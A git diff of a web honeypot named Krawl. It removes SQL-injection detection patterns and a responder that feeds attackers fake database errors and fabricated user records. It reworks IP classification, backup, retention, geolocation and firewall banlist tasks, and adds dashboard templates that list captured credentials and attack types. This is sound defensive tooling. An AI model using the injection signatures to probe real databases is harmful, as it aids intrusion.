r"table_schema", r"table_name"], - } - - for injection_type, pattern_list in patterns.items(): - for pattern in pattern_list: - if re.search(pattern, query_lower): - return injection_type - - return None - - -def get_random_sql_error( - db_type: str = None, injection_type: str = None -) -> Tuple[str, str]: - wl = get_wordlists() - sql_errors = wl.sql_errors - - if not sql_errors: - return ("Database error occurred", "text/plain") - - if not db_type: - db_type = random.choice(list(sql_errors.keys())) - - db_errors = sql_errors.get(db_type, {}) - - if injection_type and injection_type in db_errors: - errors = db_errors[injection_type] - elif "generic" in db_errors: - errors = db_errors["generic"] - else: - all_errors = [] - for error_list in db_errors.values(): - if isinstance(error_list, list): - all_errors.extend(error_list) - errors = all_errors if all_errors else ["Database error occurred"] - - error_message = random.choice(errors) if errors else "Database error occurred" - - if "{table}" in error_message: - tables = ["users", "products", "orders", "customers", "accounts", "sessions"] - error_message = error_message.replace("{table}", random.choice(tables)) - - if "{column}" in error_message: - columns = ["id", "name", "email", "password", "username", "created_at"] - error_message = error_message.replace("{column}", random.choice(columns)) - - return (error_message, "text/plain") - - -def generate_sql_error_response( - query_string: str, db_type: str = None -) -> Tuple[str, str, int]: - injection_type = detect_sql_injection_pattern(query_string) - - if not injection_type: - return (None, None, None) - - error_message, content_type = get_random_sql_error(db_type, injection_type) - - status_code = 500 - - if random.random() < 0.3: - status_code = 200 - - return (error_message, content_type, status_code) - - -def get_sql_response_with_data(path: str, params: str) -> str: - import json - from generators import random_username, random_email, random_password - - injection_type = detect_sql_injection_pattern(params) - - if injection_type in ["union", "boolean", "stacked"]: - data = { - "success": True, - "results": [ - { - "id": i, - "username": random_username(), - "email": random_email(), - "password_hash": random_password(), - "role": random.choice(["admin", "user", "moderator"]), - } - for i in range(1, random.randint(2, 5)) - ], - } - return json.dumps(data, indent=2) - - return json.dumps( - {"success": True, "message": "Query executed successfully", "results": []}, - indent=2, - ) diff --git a/src/tasks/analyze_ips.py b/src/tasks/analyze_ips.py index 7602f18..f62df40 100644 --- a/src/tasks/analyze_ips.py +++ b/src/tasks/analyze_ips.py @@ -1,7 +1,5 @@ -from sqlalchemy import select -from typing import Optional -from database import get_database, DatabaseManager -from zoneinfo import ZoneInfo +from collections import Counter +from database import get_database from pathlib import Path from datetime import datetime, timedelta import re @@ -9,8 +7,6 @@ import urllib.parse from wordlists import get_wordlists from config import get_config from logger import get_app_logger -import requests -from sanitizer import sanitize_for_storage, sanitize_dict # ---------------------- # TASK CONFIG @@ -74,7 +70,7 @@ def main(): "risky_http_methods": 6, "robots_violations": 4, "uneven_request_timing": 3, - "different_user_agents": 8, + "different_user_agents": 2, "attack_url": 15, }, "good_crawler": { @@ -88,7 +84,7 @@ def main(): "risky_http_methods": 2, "robots_violations": 7, "uneven_request_timing": 0, - "different_user_agents": 5, + "different_user_agents": 7, "attack_url": 5, }, "regular_user": { @@ -99,67 +95,45 @@ def main(): "attack_url": 0, }, } - # Get IPs with recent activity (last minute to match cron schedule) - recent_accesses = db_manager.get_access_logs(limit=999999999, since_minutes=1) - ips_to_analyze = {item["ip"] for item in recent_accesses} + # Parse robots.txt once before the loop (it never changes during a run) + robots_disallows = [] + robots_path = Path(__file__).parent.parent / "templates" / "html" / "robots.txt" + with open(robots_path, "r") as f: + for line in f: + line = line.strip() + if not line: + continue + parts = line.split(":") + if parts[0] == "Disallow": + parts[1] = parts[1].rstrip("/") + robots_disallows.append(parts[1].strip()) + + # Get IPs flagged for reevaluation (set when a suspicious request arrives) + ips_to_analyze = set(db_manager.get_ips_needing_reevaluation()) if not ips_to_analyze: - app_logger.debug("[Background Task] analyze-ips: No recent activity, skipping") + app_logger.debug( + "[Background Task] analyze-ips: No IPs need reevaluation, skipping" + ) return for ip in ips_to_analyze: # Get full history for this IP to perform accurate analysis - ip_accesses = db_manager.get_access_logs(limit=999999999, ip_filter=ip) + ip_accesses = db_manager.get_access_logs( + limit=10000, ip_filter=ip, since_minutes=1440 * 30 + ) # look back up to 30 days of history for better accuracy total_accesses_count = len(ip_accesses) if total_accesses_count <= 0: - return + continue - # Set category as "unknown" for the first 3 requests - if total_accesses_count < 3: - category = "unknown" - analyzed_metrics = {} - category_scores = { - "attacker": 0, - "good_crawler": 0, - "bad_crawler": 0, - "regular_user": 0, - "unknown": 0, - } - last_analysis = datetime.now() - db_manager.update_ip_stats_analysis( - ip, analyzed_metrics, category, category_scores, last_analysis - ) - return 0 # --------------------- HTTP Methods --------------------- - get_accesses_count = len( - [item for item in ip_accesses if item["method"] == "GET"] - ) - post_accesses_count = len( - [item for item in ip_accesses if item["method"] == "POST"] - ) - put_accesses_count = len( - [item for item in ip_accesses if item["method"] == "PUT"] - ) - delete_accesses_count = len( - [item for item in ip_accesses if item["method"] == "DELETE"] - ) - head_accesses_count = len( - [item for item in ip_accesses if item["method"] == "HEAD"] - ) - options_accesses_count = len( - [item for item in ip_accesses if item["method"] == "OPTIONS"] - ) - patch_accesses_count = len( - [item for item in ip_accesses if item["method"] == "PATCH"] - ) + method_counts = Counter(item["method"] for item in ip_accesses) if total_accesses_count > http_risky_methods_threshold: - http_method_attacker_score = ( - post_accesses_count - + put_accesses_count - + delete_accesses_count - + options_accesses_count - + patch_accesses_count - ) / total_accesses_count + risky_count = sum( + method_counts.get(m, 0) + for m in ("POST", "PUT", "DELETE", "OPTIONS", "PATCH") + ) + http_method_attacker_score = risky_count / total_accesses_count else: http_method_attacker_score = 0 # print(f"HTTP Method attacker score: {http_method_attacker_score}") @@ -174,21 +148,6 @@ def main(): score["bad_crawler"]["risky_http_methods"] = False score["regular_user"]["risky_http_methods"] = False # --------------------- Robots Violations --------------------- - # respect robots.txt and login/config pages access frequency - robots_disallows = [] - robots_path = Path(__file__).parent.parent / "templates" / "html" / "robots.txt" - with open(robots_path, "r") as f: - for line in f: - line = line.strip() - if not line: - continue - parts = line.split(":") - - if parts[0] == "Disallow": - parts[1] = parts[1].rstrip("/") - # print(f"DISALLOW {parts[1]}") - robots_disallows.append(parts[1].strip()) - # if 0 100% sure is good crawler, if >10% of robots violated is bad crawler or attacker violated_robots_count = len( [ item @@ -261,7 +220,7 @@ def main(): if len(user_agents_used) >= user_agents_used_threshold: score["attacker"]["different_user_agents"] = True score["good_crawler"]["different_user_agents"] = False - score["bad_crawler"]["different_user_agentss"] = True + score["bad_crawler"]["different_user_agents"] = True score["regular_user"]["different_user_agents"] = False else: score["attacker"]["different_user_agents"] = False diff --git a/src/tasks/db_dump.py b/src/tasks/db_dump.py new file mode 100644 index 0000000..fbc3ef9 --- /dev/null +++ b/src/tasks/db_dump.py @@ -0,0 +1,102 @@ +# tasks/db_dump.py + +from logger import get_app_logger +from database import get_database +from config import get_config +from sqlalchemy import MetaData +from sqlalchemy.schema import CreateTable +import os + +config = get_config() +app_logger = get_app_logger() + +# ---------------------- +# TASK CONFIG +# ---------------------- +TASK_CONFIG = { + "name": "dump-krawl-data", + "cron": f"{config.backups_cron}", + "enabled": config.backups_enabled, + "run_when_loaded": True, +} + + +# ---------------------- +# TASK LOGIC +# ---------------------- +def main(): + """ + Dump krawl database to a sql file for backups + """ + task_name = TASK_CONFIG.get("name") + app_logger.info(f"[Background Task] {task_name} starting...") + + try: + db = get_database() + engine = db._engine + + metadata = MetaData() + metadata.reflect(bind=engine) + + # create backup directory + os.makedirs(config.backups_path, exist_ok=True) + output_file = os.path.join(config.backups_path, "db_dump.sql") + + with open(output_file, "w") as f: + # Write header + app_logger.info(f"[Background Task] {task_name} started database dump") + + # Dump schema (CREATE TABLE statements) + f.write("-- Schema\n") + f.write("-- " + "=" * 70 + "\n\n") + + for table_name in metadata.tables: + table = metadata.tables[table_name] + app_logger.info( + f"[Background Task] {task_name} dumping {table} table schema" + ) + + # Create table statement + create_stmt = str(CreateTable(table).compile(engine)) + f.write(f"{create_stmt};\n\n") + + f.write("\n-- Data\n") + f.write("-- " + "=" * 70 + "\n\n") + + with engine.connect() as conn: + for table_name in metadata.tables: + table = metadata.tables[table_name] + + f.write(f"-- Table: {table_name}\n") + + # Select all data from table + result = conn.execute(table.select()) + rows = result.fetchall() + + if rows: + app_logger.info( + f"[Background Task] {task_name} dumping {table} content" + ) + for row in rows: + # Build INSERT statement + columns = ", ".join([col.name for col in table.columns]) + values = ", ".join([repr(value) for value in row]) + f.write( + f"INSERT INTO {table_name} ({columns}) VALUES ({values});\n" + ) + + f.write("\n") + else: + f.write(f"-- No data in {table_name}\n\n") + app_logger.info( + f"[Background Task] {task_name} no data in {table}" + ) + + app_logger.info( + f"[Background Task] {task_name} Database dump completed: {output_file}" + ) + + except Exception as e: + app_logger.error(f"[Background Task] {task_name} failed: {e}") + finally: + db.close_session() diff --git a/src/tasks/db_retention.py b/src/tasks/db_retention.py new file mode 100644 index 0000000..af803c6 --- /dev/null +++ b/src/tasks/db_retention.py @@ -0,0 +1,81 @@ +#!/usr/bin/env python3 + +""" +Database retention task for Krawl honeypot. +Periodically deletes old records based on configured retention_days. +""" + +from datetime import datetime, timedelta + +from database import get_database +from logger import get_app_logger + +# ---------------------- +# TASK CONFIG +# ---------------------- + +TASK_CONFIG = { + "name": "db-retention", + "cron": "0 3 * * *", # Run daily at 3 AM + "enabled": True, + "run_when_loaded": False, +} + +app_logger = get_app_logger() + + +def main(): + """ + Delete access logs, credential attempts, and attack detections + older than the configured retention period. + """ + try: + from config import get_config + from models import AccessLog, CredentialAttempt, AttackDetection + + config = get_config() + retention_days = config.database_retention_days + + db = get_database() + session = db.session + + cutoff = datetime.now() - timedelta(days=retention_days) + + # Delete attack detections linked to old access logs first (FK constraint) + old_log_ids = session.query(AccessLog.id).filter(AccessLog.timestamp < cutoff) + detections_deleted = ( + session.query(AttackDetection) + .filter(AttackDetection.access_log_id.in_(old_log_ids)) + .delete(synchronize_session=False) + ) + + # Delete old access logs + logs_deleted = ( + session.query(AccessLog) + .filter(AccessLog.timestamp < cutoff) + .delete(synchronize_session=False) + ) + + # Delete old credential attempts + creds_deleted = ( + session.query(CredentialAttempt) + .filter(CredentialAttempt.timestamp < cutoff) + .delete(synchronize_session=False) + ) + + session.commit() + + if logs_deleted or creds_deleted or detections_deleted: + app_logger.info( + f"DB retention: Deleted {logs_deleted} access logs, " + f"{detections_deleted} attack detections, " + f"{creds_deleted} credential attempts older than {retention_days} days" + ) + + except Exception as e: + app_logger.error(f"Error during DB retention cleanup: {e}") + finally: + try: + db.close_session() + except Exception as e: + app_logger.error(f"Error closing DB session after retention cleanup: {e}") diff --git a/src/tasks/fetch_ip_rep.py b/src/tasks/fetch_ip_rep.py index eac6645..ddaea49 100644 --- a/src/tasks/fetch_ip_rep.py +++ b/src/tasks/fetch_ip_rep.py @@ -2,7 +2,7 @@ from database import get_database from logger import get_app_logger import requests from sanitizer import sanitize_for_storage, sanitize_dict -from geo_utils import get_most_recent_geoip_data, extract_city_from_coordinates +from geo_utils import extract_geolocation_from_ip, fetch_blocklist_data # ---------------------- # TASK CONFIG @@ -27,34 +27,51 @@ def main(): ) for ip in unenriched_ips: try: - api_url = "https://iprep.lcrawl.com/api/iprep/" - params = {"cidr": ip} - headers = {"Content-Type": "application/json"} - response = requests.get(api_url, headers=headers, params=params, timeout=10) - payload = response.json() + # Fetch geolocation data using ip-api.com + geoloc_data = extract_geolocation_from_ip(ip) - if payload.get("results"): - results = payload["results"] + # Fetch blocklist data from lcrawl API + blocklist_data = fetch_blocklist_data(ip) - # Get the most recent result (first in list, sorted by record_added) - most_recent = results[0] - geoip_data = most_recent.get("geoip_data", {}) - list_on = most_recent.get("list_on", {}) + if geoloc_data: + # Extract fields from the new API response + country_iso_code = geoloc_data.get("country_code") + country = geoloc_data.get("country") + region = geoloc_data.get("region") + region_name = geoloc_data.get("region_name") + city = geoloc_data.get("city") + timezone = geoloc_data.get("timezone") + isp = geoloc_data.get("isp") + reverse = geoloc_data.get("reverse") + asn = geoloc_data.get("asn") + asn_org = geoloc_data.get("org") + latitude = geoloc_data.get("latitude") + longitude = geoloc_data.get("longitude") + is_proxy = geoloc_data.get("is_proxy", False) + is_hosting = geoloc_data.get("is_hosting", False) - # Extract standard fields - country_iso_code = geoip_data.get("country_iso_code") - asn = geoip_data.get("asn_autonomous_system_number") - asn_org = geoip_data.get("asn_autonomous_system_organization") - latitude = geoip_data.get("location_latitude") - longitude = geoip_data.get("location_longitude") + # Use blocklist data if available, otherwise create default with flags + if blocklist_data: + list_on = blocklist_data + else: + list_on = {} - # Extract city from coordinates using reverse geocoding - city = extract_city_from_coordinates(geoip_data) + # Add flags to list_on + list_on["is_proxy"] = is_proxy + list_on["is_hosting"] = is_hosting sanitized_country_iso_code = sanitize_for_storage(country_iso_code, 3) + sanitized_country = sanitize_for_storage(country, 100) + sanitized_region = sanitize_for_storage(region, 2) + sanitized_region_name = sanitize_for_storage(region_name, 100) sanitized_asn = sanitize_for_storage(asn, 100) sanitized_asn_org = sanitize_for_storage(asn_org, 100) sanitized_city = sanitize_for_storage(city, 100) if city else None + sanitized_timezone = sanitize_for_storage(timezone, 50) + sanitized_isp = sanitize_for_storage(isp, 100) + sanitized_reverse = ( + sanitize_for_storage(reverse, 255) if reverse else None + ) sanitized_list_on = sanitize_dict(list_on, 100000) db_manager.update_ip_rep_infos( @@ -63,11 +80,19 @@ def main(): sanitized_asn, sanitized_asn_org, sanitized_list_on, - sanitized_city, - latitude, - longitude, + city=sanitized_city, + latitude=latitude, + longitude=longitude, + country=sanitized_country, + region=sanitized_region, + region_name=sanitized_region_name, + timezone=sanitized_timezone, + isp=sanitized_isp, + reverse=sanitized_reverse, + is_proxy=is_proxy, + is_hosting=is_hosting, ) except requests.RequestException as e: - app_logger.warning(f"Failed to fetch IP rep for {ip}: {e}") + app_logger.warning(f"Failed to fetch geolocation for {ip}: {e}") except Exception as e: app_logger.error(f"Error processing IP {ip}: {e}") diff --git a/src/tasks/flag_stale_ips.py b/src/tasks/flag_stale_ips.py new file mode 100644 index 0000000..0428e15 --- /dev/null +++ b/src/tasks/flag_stale_ips.py @@ -0,0 +1,46 @@ +from database import get_database +from logger import get_app_logger + +# ---------------------- +# TASK CONFIG +# ---------------------- + +TASK_CONFIG = { + "name": "flag-stale-ips", + "cron": "0 2 * * *", # Run daily at 2 AM + "enabled": True, + "run_when_loaded": True, +} + +# Set to True to force all IPs to be flagged for reevaluation on next run. +# Resets to False automatically after execution. +FORCE_IP_RESCAN = False + + +def main(): + global FORCE_IP_RESCAN + + app_logger = get_app_logger() + db = get_database() + + try: + if FORCE_IP_RESCAN: + count = db.flag_all_ips_for_reevaluation() + FORCE_IP_RESCAN = False + app_logger.info( + f"[Background Task] flag-stale-ips: FORCE RESCAN - Flagged {count} IPs for reevaluation" + ) + else: + count = db.flag_stale_ips_for_reevaluation() + if count > 0: + app_logger.info( + f"[Background Task] flag-stale-ips: Flagged {count} stale IPs for reevaluation" + ) + else: + app_logger.debug( + "[Background Task] flag-stale-ips: No stale IPs found to flag" + ) + except Exception as e: + app_logger.error( + f"[Background Task] flag-stale-ips: Error flagging stale IPs: {e}" + ) diff --git a/src/tasks/memory_cleanup.py b/src/tasks/memory_cleanup.py index 38a27a2..dc230fd 100644 --- a/src/tasks/memory_cleanup.py +++ b/src/tasks/memory_cleanup.py @@ -2,10 +2,12 @@ """ Memory cleanup task for Krawl honeypot. -Periodically trims unbounded in-memory structures to prevent OOM. + +NOTE: This task is no longer needed. Ban/rate-limit state has been moved from +in-memory ip_page_visits dict to the ip_stats DB table, eliminating unbounded +memory growth. Kept disabled for reference. """ -from database import get_database from logger import get_app_logger # ---------------------- @@ -14,8 +16,8 @@ from logger import get_app_logger TASK_CONFIG = { "name": "memory-cleanup", - "cron": "*/5 * * * *", # Run every 5 minutes - "enabled": True, + "cron": "*/5 * * * *", + "enabled": False, "run_when_loaded": False, } @@ -23,49 +25,4 @@ app_logger = get_app_logger() def main(): - """ - Clean up in-memory structures in the tracker. - Called periodically to prevent unbounded memory growth. - """ - try: - # Import here to avoid circular imports - from handler import Handler - - if not Handler.tracker: - app_logger.warning("Tracker not initialized, skipping memory cleanup") - return - - # Get memory stats before cleanup - stats_before = Handler.tracker.get_memory_stats() - - # Run cleanup - Handler.tracker.cleanup_memory() - - # Get memory stats after cleanup - stats_after = Handler.tracker.get_memory_stats() - - # Log changes - access_log_reduced = ( - stats_before["access_log_size"] - stats_after["access_log_size"] - ) - cred_reduced = ( - stats_before["credential_attempts_size"] - - stats_after["credential_attempts_size"] - ) - - if access_log_reduced > 0 or cred_reduced > 0: - app_logger.info( - f"Memory cleanup: Trimmed {access_log_reduced} access logs, " - f"{cred_reduced} credential attempts" - ) - - # Log current memory state for monitoring - app_logger.debug( - f"Memory stats after cleanup: " - f"access_logs={stats_after['access_log_size']}, " - f"credentials={stats_after['credential_attempts_size']}, " - f"unique_ips={stats_after['unique_ips_tracked']}" - ) - - except Exception as e: - app_logger.error(f"Error during memory cleanup: {e}") + app_logger.debug("memory-cleanup task is disabled (ban state now in DB)") diff --git a/src/tasks/top_attacking_ips.py b/src/tasks/top_attacking_ips.py index c0cfbec..69d417b 100644 --- a/src/tasks/top_attacking_ips.py +++ b/src/tasks/top_attacking_ips.py @@ -4,9 +4,14 @@ import os from logger import get_app_logger from database import get_database from config import get_config -from models import IpStats +from models import IpStats, AccessLog from ip_utils import is_valid_public_ip +from sqlalchemy import distinct +from firewall.fwtype import FWType +from firewall.iptables import Iptables +from firewall.raw import Raw +config = get_config() app_logger = get_app_logger() # ---------------------- @@ -20,7 +25,7 @@ TASK_CONFIG = { } EXPORTS_DIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), "exports") -OUTPUT_FILE = os.path.join(EXPORTS_DIR, "malicious_ips.txt") +EXPORTS_DIR = config.exports_path # ---------------------- @@ -48,7 +53,6 @@ def main(): ) # Filter out local/private IPs and the server's own IP - config = get_config() server_ip = config.get_server_ip() public_ips = [ @@ -61,14 +65,24 @@ def main(): os.makedirs(EXPORTS_DIR, exist_ok=True) # Write IPs to file (one per line) - with open(OUTPUT_FILE, "w") as f: - for ip in public_ips: - f.write(f"{ip}\n") + for fwname in FWType._registry: - app_logger.info( - f"[Background Task] {task_name} exported {len(public_ips)} attacker IPs " - f"(filtered {len(attackers) - len(public_ips)} local/private IPs) to {OUTPUT_FILE}" - ) + # get banlist for specific ip + fw = FWType.create(fwname) + banlist = fw.getBanlist(public_ips) + + output_file = os.path.join(EXPORTS_DIR, f"{fwname}_banlist.txt") + + if fwname == "raw": + output_file = os.path.join(EXPORTS_DIR, f"malicious_ips.txt") + + with open(output_file, "w") as f: + f.write(f"{banlist}\n") + + app_logger.info( + f"[Background Task] {task_name} exported {len(public_ips)} in {fwname} public IPs" + f"(filtered {len(attackers) - len(public_ips)} local/private IPs) to {output_file}" + ) except Exception as e: app_logger.error(f"[Background Task] {task_name} failed: {e}") diff --git a/src/tasks_master.py b/src/tasks_master.py index 9017c49..1f910f0 100644 --- a/src/tasks_master.py +++ b/src/tasks_master.py @@ -40,7 +40,6 @@ class TasksMaster: def __init__(self, scheduler: BackgroundScheduler): self.tasks = self._config_tasks() self.scheduler = scheduler - self.last_run_times = {} self.scheduler.add_listener( self.job_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR ) @@ -234,9 +233,6 @@ class TasksMaster: app_logger.error(f"Failed to load {module_name}: {e}") def job_listener(self, event): - job_id = event.job_id - self.last_run_times[job_id] = datetime.datetime.now() - if event.exception: app_logger.error(f"Job {event.job_id} failed: {event.exception}") else: diff --git a/src/templates/dashboard_template.py b/src/templates/dashboard_template.py deleted file mode 100644 index 89ca4fb..0000000 --- a/src/templates/dashboard_template.py +++ /dev/null @@ -1,2665 +0,0 @@ -#!/usr/bin/env python3 - -""" -Dashboard template for viewing honeypot statistics. -Customize this template to change the dashboard appearance. -""" - -import html -from datetime import datetime -from zoneinfo import ZoneInfo - - -def _escape(value) -> str: - """Escape HTML special characters to prevent XSS attacks.""" - if value is None: - return "" - return html.escape(str(value)) - - -def format_timestamp(iso_timestamp: str, time_only: bool = False) -> str: - """Format ISO timestamp for display with timezone conversion - - Args: - iso_timestamp: ISO format timestamp string (UTC) - time_only: If True, return only HH:MM:SS, otherwise full datetime - """ - try: - # Parse UTC timestamp - dt = datetime.fromisoformat(iso_timestamp) - if time_only: - return dt.strftime("%H:%M:%S") - return dt.strftime("%Y-%m-%d %H:%M:%S") - except Exception: - # Fallback for old format - return ( - iso_timestamp.split("T")[1][:8] if "T" in iso_timestamp else iso_timestamp - ) - - -def generate_dashboard(stats: dict, dashboard_path: str = "") -> str: - """Generate dashboard HTML with access statistics - - Args: - stats: Statistics dictionary - dashboard_path: The secret dashboard path for generating API URLs - """ - - # Generate suspicious accesses rows with clickable IPs - suspicious_rows = ( - "\n".join([f""" - {_escape(log["ip"])} - {_escape(log["path"])} - {_escape(log["user_agent"][:60])} - {format_timestamp(log["timestamp"], time_only=True)} - - - -
-
Loading stats...
-
- - """ for log in stats["recent_suspicious"][-10:]]) - or 'No suspicious activity detected' - ) - - return f""" - - - - Krawl Dashboard - - - - - - - -
- - -

Krawl Dashboard

- -
-
-
{stats['total_accesses']}
-
Total Accesses
-
-
-
{stats['unique_ips']}
-
Unique IPs
-
-
-
{stats['unique_paths']}
-
Unique Paths
-
-
-
{stats['suspicious_accesses']}
-
Suspicious Accesses
-
-
-
{stats.get('honeypot_ips', 0)}
-
Honeypot Caught
-
-
-
{len(stats.get('credential_attempts', []))}
-
Credentials Captured
-
-
-
{stats.get('unique_attackers', 0)}
-
Unique Attackers
-
-
- - - -
-
-

Recent Suspicious Activity

- - - - - - - - - - - {suspicious_rows} - -
IP AddressPathUser-AgentTime
-
- -
-
-

Honeypot Triggers by IP

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - -
#IP AddressAccessed PathsCount
Loading...
-
- -
-
-
-

Top IP Addresses

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - -
#IP AddressAccess Count
Loading...
-
- -
-
-

Top User-Agents

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - -
#User-AgentCount
Loading...
-
-
-
- -
-
-
-

IP Origins Map

-
- - - - - -
-
-
-
Loading map...
-
-
- -
-
-

Attackers by Total Requests

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - - - - -
#IP AddressTotal RequestsFirst SeenLast SeenLocation
-
- -
-
-

Captured Credentials

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - - - -
#IP AddressUsernamePasswordPathTime
Loading...
-
- -
-
-

Detected Attack Types

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - - - -
#IP AddressPathAttack TypesUser-AgentTime
Loading...
-
- -
-
-

Most Recurring Attack Types

-
Top 10 Attack Vectors
-
-
- -
-
-
- -
-
- -
- -
-
-
-
- - - -""" diff --git a/src/templates/jinja2/base.html b/src/templates/jinja2/base.html new file mode 100644 index 0000000..22105c4 --- /dev/null +++ b/src/templates/jinja2/base.html @@ -0,0 +1,28 @@ + + + + + + Krawl Dashboard + + + + + + + + + + + + + + {% block content %}{% endblock %} + + + + + + {% block scripts %}{% endblock %} + + diff --git a/src/templates/jinja2/dashboard/index.html b/src/templates/jinja2/dashboard/index.html new file mode 100644 index 0000000..fef46c6 --- /dev/null +++ b/src/templates/jinja2/dashboard/index.html @@ -0,0 +1,191 @@ +{% extends "base.html" %} + +{% block content %} +
+ + {# GitHub logo #} + + + {# Banlist export dropdown - Alpine.js #} +
+
+ + +
+
+ +

Krawl Dashboard

+ + {# Stats cards - server-rendered #} + {% include "dashboard/partials/stats_cards.html" %} + + {# Search bar #} +
+ +
+
+ + {# Tab navigation - Alpine.js #} + + + {# ==================== OVERVIEW TAB ==================== #} +
+ + {# Map section #} + {% include "dashboard/partials/map_section.html" %} + + {# Suspicious Activity - server-rendered (last 10 requests) #} + {% include "dashboard/partials/suspicious_table.html" %} + + {# Top IPs + Top User-Agents side by side #} +
+
+

Top IP Addresses

+
+
Loading...
+
+
+
+

Top User-Agents

+
+
Loading...
+
+
+
+ + {# Top Paths #} +
+

Top Paths

+
+
Loading...
+
+
+
+ + {# ==================== ATTACKS TAB ==================== #} +
+ + {# Attackers table - HTMX loaded #} +
+

Attackers by Total Requests

+
+
Loading...
+
+
+ + {# Credentials table #} +
+

Captured Credentials

+
+
Loading...
+
+
+ + {# Honeypot Triggers - HTMX loaded #} +
+

Honeypot Triggers by IP

+
+
Loading...
+
+
+ + {# Attack Types table #} +
+

Detected Attack Types

+
+
Loading...
+
+
+ + {# Charts + Patterns side by side #} +
+
+

Most Recurring Attack Types

+
+ +
+
+
+

Most Recurring Attack Patterns

+
+
Loading...
+
+
+
+
+ + {# ==================== IP INSIGHT TAB ==================== #} +
+ {# IP Insight content - loaded via HTMX when IP is selected #} +
+ +
+
+
+ + {# Raw request modal - Alpine.js #} + {% include "dashboard/partials/raw_request_modal.html" %} + +
+{% endblock %} diff --git a/src/templates/jinja2/dashboard/ip.html b/src/templates/jinja2/dashboard/ip.html new file mode 100644 index 0000000..d09ad88 --- /dev/null +++ b/src/templates/jinja2/dashboard/ip.html @@ -0,0 +1,38 @@ +{% extends "base.html" %} + +{% block content %} +
+ + {# GitHub logo #} + + + {# Back to dashboard link #} + + + {% set uid = "ip" %} + {% include "dashboard/partials/_ip_detail.html" %} + + {# Raw Request Modal #} +
+
+
+

Raw Request

+ × +
+
+

+            
+ +
+
+
+{% endblock %} diff --git a/src/templates/jinja2/dashboard/partials/_ip_detail.html b/src/templates/jinja2/dashboard/partials/_ip_detail.html new file mode 100644 index 0000000..1812b1d --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/_ip_detail.html @@ -0,0 +1,295 @@ +{# Shared IP detail content – included by ip.html and ip_insight.html. + Expects: stats, ip_address, dashboard_path, uid (unique prefix for element IDs) #} + +{# Page header #} +
+

+ {{ ip_address }} + {% if stats.category %} + + {{ stats.category | replace('_', ' ') | title }} + + {% endif %} +

+ {% if stats.city or stats.country %} +

+ {{ stats.city | default('') }}{% if stats.city and stats.country %}, {% endif %}{{ stats.country | default(stats.country_code | default('')) }} +

+ {% endif %} +
+ +{# ── Two-column layout: Info + Radar/Timeline ───── #} +
+ {# Left column: single IP Information card #} +
+
+

IP Information

+ + {# Activity section #} +

Activity

+
+
+
Total Requests
+
{{ stats.total_requests | default('N/A') }}
+
+
+
First Seen
+
{{ stats.first_seen | format_ts }}
+
+
+
Last Seen
+
{{ stats.last_seen | format_ts }}
+
+ {% if stats.last_analysis %} +
+
Last Analysis
+
{{ stats.last_analysis | format_ts }}
+
+ {% endif %} +
+ + {# Geo & Network section #} +

Geo & Network

+
+ {% if stats.city or stats.country %} +
+
Location
+
{{ stats.city | default('') | e }}{% if stats.city and stats.country %}, {% endif %}{{ stats.country | default(stats.country_code | default('')) | e }}
+
+ {% endif %} + {% if stats.region_name %} +
+
Region
+
{{ stats.region_name | e }}
+
+ {% endif %} + {% if stats.timezone %} +
+
Timezone
+
{{ stats.timezone | e }}
+
+ {% endif %} + {% if stats.isp %} +
+
ISP
+
{{ stats.isp | e }}
+
+ {% endif %} + {% if stats.asn_org %} +
+
Organization
+
{{ stats.asn_org | e }}
+
+ {% endif %} + {% if stats.asn %} +
+
ASN
+
AS{{ stats.asn }}
+
+ {% endif %} + {% if stats.reverse_dns %} +
+
Reverse DNS
+
{{ stats.reverse_dns | e }}
+
+ {% endif %} +
+ + {# Reputation section #} +

Reputation

+
+ {# Flags #} + {% set flags = [] %} + {% if stats.is_proxy %}{% set _ = flags.append('Proxy') %}{% endif %} + {% if stats.is_hosting %}{% set _ = flags.append('Hosting') %}{% endif %} + {% if flags %} +
+ Flags +
+ {% for flag in flags %} + {{ flag }} + {% endfor %} +
+
+ {% endif %} + + {# Blocklists #} +
+ Listed On + {% if stats.blocklist_memberships %} +
+ {% for bl in stats.blocklist_memberships %} + {{ bl | e }} + {% endfor %} +
+ {% else %} + Clean + {% endif %} +
+
+
+
+ + {# Right column: Category Analysis + Timeline + Attack Types #} +
+ {% if stats.category_scores %} +
+

Category Analysis

+
+
+
+
+ {% endif %} + + {# Bottom row: Behavior Timeline + Attack Types side by side #} +
+ {% if stats.category_history %} +
+

Behavior Timeline

+
+
+ {% for entry in stats.category_history %} +
+
+
+ {{ entry.new_category | default('unknown') | replace('_', ' ') | title }} + {% if entry.old_category %} + from {{ entry.old_category | replace('_', ' ') | title }} + {% else %} + initial classification + {% endif %} + {{ entry.timestamp | format_ts }} +
+
+ {% endfor %} +
+
+
+ {% endif %} + +
+

Attack Types

+
+ +
+
+
+
+
+ +{# Location map #} +{% if stats.latitude and stats.longitude %} +
+

Location

+
+
+{% endif %} + +{# Detected Attack Types table – only for attackers #} +{% if stats.category and stats.category | lower == 'attacker' %} +
+

Detected Attack Types

+
+
Loading...
+
+
+{% endif %} + +{# Access History table #} +
+

Access History

+
+
Loading...
+
+
+ +{# Inline init script #} + diff --git a/src/templates/jinja2/dashboard/partials/access_by_ip_table.html b/src/templates/jinja2/dashboard/partials/access_by_ip_table.html new file mode 100644 index 0000000..5e7bd6c --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/access_by_ip_table.html @@ -0,0 +1,63 @@ +{# HTMX fragment: Detected Access logs by ip table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + {% for log in items %} + + + + + + + + + + + {% else %} + + {% endfor %} + +
#PathUser-Agent + Time +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} +
+ {{ log.path | e }} + {% if log.path | length > 30 %} +
{{ log.path | e }}
+ {% endif %} +
+
{{ (log.user_agent | default(''))[:50] | e }}{{ log.timestamp | format_ts }} + {% if log.id %} + + {% endif %} +
No logs detected
